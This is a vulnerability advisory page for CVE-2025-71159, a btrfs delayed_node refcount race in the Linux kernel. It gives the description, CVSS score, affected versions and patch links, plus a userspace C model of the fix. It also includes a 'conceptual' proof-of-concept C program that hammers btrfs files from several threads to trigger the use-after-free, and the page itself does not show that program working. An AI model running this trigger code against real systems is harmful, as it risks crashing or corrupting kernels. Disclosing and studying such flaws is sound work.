Security Vulnerability Report
CVE-2025-71159 CVSS 7.8 HIGH

CVE-2025-71159

Published: 2026-01-23 16:15:53
Last Modified: 2026-02-26 20:19:48
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

btrfs: fix use-after-free warning in btrfs_get_or_create_delayed_node()

Previously, btrfs_get_or_create_delayed_node() set the delayed_node's refcount before acquiring the root->delayed_nodes lock. Commit e8513c012de7 ("btrfs: implement ref_tracker for delayed_nodes") moved refcount_set inside the critical section, which means there is no longer a memory barrier between setting the refcount and setting btrfs_inode->delayed_node.

Without that barrier, the stores to node->refs and btrfs_inode->delayed_node may become visible out of order. Another thread can then read btrfs_inode->delayed_node and attempt to increment a refcount that hasn't been set yet, leading to a refcounting bug and a use-after-free warning.

The fix is to move refcount_set back to where it was to take advantage of the implicit memory barrier provided by lock acquisition.

Because the allocations now happen outside of the lock's critical section, they can use GFP_NOFS instead of GFP_ATOMIC.
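The following userspace C model is an added illustration, not kernel or btrfs code: it shows the ordering the fix restores, with the refcount set before the node is published so that a reader which picks up the pointer without the lock never increments an unset count. The names (inode_model, race_callers), the two-reference convention and the use of release/acquire on the pointer in place of the lock-acquisition barrier are assumptions of the model; the counter uaf_warnings stands in for the refcount_t "addition on 0; use-after-free" warning.

```c
#include <pthread.h>
#include <stdatomic.h>
#include <stdlib.h>

/* Userspace model of the ordering the fix restores; not btrfs code. refs is set before
 * the node is published; release/acquire on the pointer stands in for the lock barrier. */
struct delayed_node { atomic_int refs; };
struct inode_model { _Atomic(struct delayed_node *) delayed_node; };
static pthread_mutex_t delayed_nodes_lock = PTHREAD_MUTEX_INITIALIZER;
atomic_int uaf_warnings; /* models refcount_t's "addition on 0; use-after-free" warning */
static void refcount_inc(struct delayed_node *n)
{
    if (atomic_fetch_add(&n->refs, 1) == 0)  /* incremented a refcount nobody has set yet */
        atomic_fetch_add(&uaf_warnings, 1);
}
/* Lock-free reader: correct only if refs is visible no later than the pointer. */
struct delayed_node *get_delayed_node(struct inode_model *inode)
{
    struct delayed_node *node = atomic_load_explicit(&inode->delayed_node, memory_order_acquire);
    if (node) refcount_inc(node);
    return node;
}

struct delayed_node *get_or_create_delayed_node(struct inode_model *inode)
{
    struct delayed_node *node = get_delayed_node(inode);
    if (node) return node;
    node = calloc(1, sizeof(*node));  /* outside the lock, hence GFP_NOFS in the kernel */
    atomic_store(&node->refs, 2);     /* assumed: one ref for the inode, one for the caller */
    pthread_mutex_lock(&delayed_nodes_lock);
    if (inode->delayed_node) {        /* lost the race: drop ours, take a ref on the winner's */
        free(node); node = get_delayed_node(inode);
    } else
        atomic_store_explicit(&inode->delayed_node, node, memory_order_release);
    pthread_mutex_unlock(&delayed_nodes_lock);
    return node;
}

static struct inode_model shared_inode;
static void *worker(void *arg) { (void)arg; get_or_create_delayed_node(&shared_inode); return NULL; }

/* n callers race on one inode; returns the final refcount, n + 1 if nothing went wrong. */
int race_callers(int n)
{
    pthread_t *t = calloc((size_t)n, sizeof(*t));
    for (int i = 0; i < n; i++) pthread_create(&t[i], NULL, worker, NULL);
    for (int i = 0; i < n; i++) pthread_join(t[i], NULL);
    free(t);
    return atomic_load(&shared_inode.delayed_node->refs);
}
```

With eight racing callers the published node ends with nine references (two from the creator plus one per other caller) and no warning, because every reader observes refs already set.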

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (versions from 6.18 up to, but excluding, 6.18.6)
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:* - VULNERABLE
Linux kernel btrfs (vulnerability introduced by commit e8513c012de7)
Affected kernel versions are those containing the code between commit e8513c012de7 and the fixing release.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2025-71159 PoC - btrfs delayed_node use-after-free
 * This is a conceptual proof-of-concept demonstrating the race condition.
 * Actual exploitation requires kernel debugging and specific btrfs operations.
 *
 * Compile: gcc -o cve_poc cve_poc.c -lpthread
 * Run as low-privileged user on btrfs filesystem
 */
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>

#define NUM_THREADS 4
#define NUM_ITERATIONS 10000

void *writer_thread(void *arg)
{
    /*
     * Thread that triggers delayed node creation via btrfs operations.
     * This thread performs file operations that invoke btrfs_get_or_create_delayed_node().
     * The race condition occurs when refcount is set inside the lock critical section.
     */
    int fd;
    char filepath[256];

    (void)arg;
    for (int i = 0; i < NUM_ITERATIONS; i++) {
        snprintf(filepath, sizeof(filepath), "/mnt/btrfs/test_file_%d", i % 100);
        fd = open(filepath, O_CREAT | O_WRONLY, 0644);
        if (fd >= 0) {
            write(fd, "test data", 9);
            /* Force delayed node allocation */
            fsync(fd);
            close(fd);
        }
    }
    return NULL;
}

void *reader_thread(void *arg)
{
    /*
     * Thread that attempts to access delayed nodes concurrently.
     * This can trigger the use-after-free when reading delayed_node
     * before refcount is properly set.
     */
    int fd;
    char filepath[256];

    (void)arg;
    for (int i = 0; i < NUM_ITERATIONS; i++) {
        snprintf(filepath, sizeof(filepath), "/mnt/btrfs/test_file_%d", i % 100);
        fd = open(filepath, O_RDONLY);
        if (fd >= 0) {
            /*
             * Read operations may access delayed_node concurrently.
             * Under race conditions, this can trigger the use-after-free.
             */
            char buf[512];
            read(fd, buf, sizeof(buf));
            close(fd);
        }
        /* Small delay to increase race window */
        usleep(1);
    }
    return NULL;
}

int main(void)
{
    pthread_t threads[NUM_THREADS];

    printf("CVE-2025-71159 PoC - btrfs delayed_node UAF\n");
    printf("This PoC demonstrates concurrent access to btrfs delayed nodes.\n");
    printf("Target: Linux kernel btrfs use-after-free in btrfs_get_or_create_delayed_node()\n");

    /* Create writer threads */
    for (int i = 0; i < NUM_THREADS / 2; i++) {
        pthread_create(&threads[i], NULL, writer_thread, NULL);
    }
    /* Create reader threads */
    for (int i = NUM_THREADS / 2; i < NUM_THREADS; i++) {
        pthread_create(&threads[i], NULL, reader_thread, NULL);
    }
    /* Wait for all threads */
    for (int i = 0; i < NUM_THREADS; i++) {
        pthread_join(threads[i], NULL);
    }

    printf("PoC execution completed. Check dmesg for use-after-free warnings.\n");
    return 0;
}
```

References

https://git.kernel.org/stable/c/83f59076a1ae6f5c6845d6f7ed3a1a373d883684 (Patch)
https://git.kernel.org/stable/c/c8385851a5435f4006281828d428e5d0b0bbf8af (Patch)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-71159", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:52.793", "lastModified": "2026-02-26T20:19:48.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix use-after-free warning in btrfs_get_or_create_delayed_node()\n\nPreviously, btrfs_get_or_create_delayed_node() set the delayed_node's\nrefcount before acquiring the root->delayed_nodes lock.\nCommit e8513c012de7 (\"btrfs: implement ref_tracker for delayed_nodes\")\nmoved refcount_set inside the critical section, which means there is\nno longer a memory barrier between setting the refcount and setting\nbtrfs_inode->delayed_node.\n\nWithout that barrier, the stores to node->refs and\nbtrfs_inode->delayed_node may become visible out of order. Another\nthread can then read btrfs_inode->delayed_node and attempt to\nincrement a refcount that hasn't been set yet, leading to a\nrefcounting bug and a use-after-free warning.\n\nThe fix is to move refcount_set back to where it was to take\nadvantage of the implicit memory barrier provided by lock\nacquisition.\n\nBecause the allocations now happen outside of the lock's critical\nsection, they can use GFP_NOFS instead of GFP_ATOMIC."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nbtrfs: soluciona la advertencia de uso después de liberación en btrfs_get_or_create_delayed_node()\n\nAnteriormente, btrfs_get_or_create_delayed_node() establecía el refcount del delayed_node antes de adquirir el bloqueo root-&gt;delayed_nodes. El commit e8513c012de7 ('btrfs: implementa ref_tracker para delayed_nodes') movió refcount_set dentro de la sección crítica, lo que significa que ya no hay una barrera de memoria entre el establecimiento del refcount y el establecimiento de btrfs_inode-&gt;delayed_node.\n\nSin esa barrera, los almacenamientos en node-&gt;refs y btrfs_inode-&gt;delayed_node pueden volverse visibles fuera de orden. Otro hilo puede entonces leer btrfs_inode-&gt;delayed_node e intentar incrementar un refcount que aún no ha sido establecido, lo que lleva a un error de refcounting y a una advertencia de uso después de liberación.\n\nLa solución es mover refcount_set de vuelta a donde estaba para aprovechar la barrera de memoria implícita proporcionada por la adquisición del bloqueo.\n\nDebido a que las asignaciones ahora ocurren fuera de la sección crítica del bloqueo, pueden usar GFP_NOFS en lugar de GFP_ATOMIC."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.18", "versionEndExcluding": "6.18.6", "matchCriteriaId": "B263F4AD-C03D-4E6A-995E-B822989C3A7A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/83f59076a1ae6f5c6845d6f7ed3a1a373d883684", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c8385851a5435f4006281828d428e5d0b0bbf8af", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
```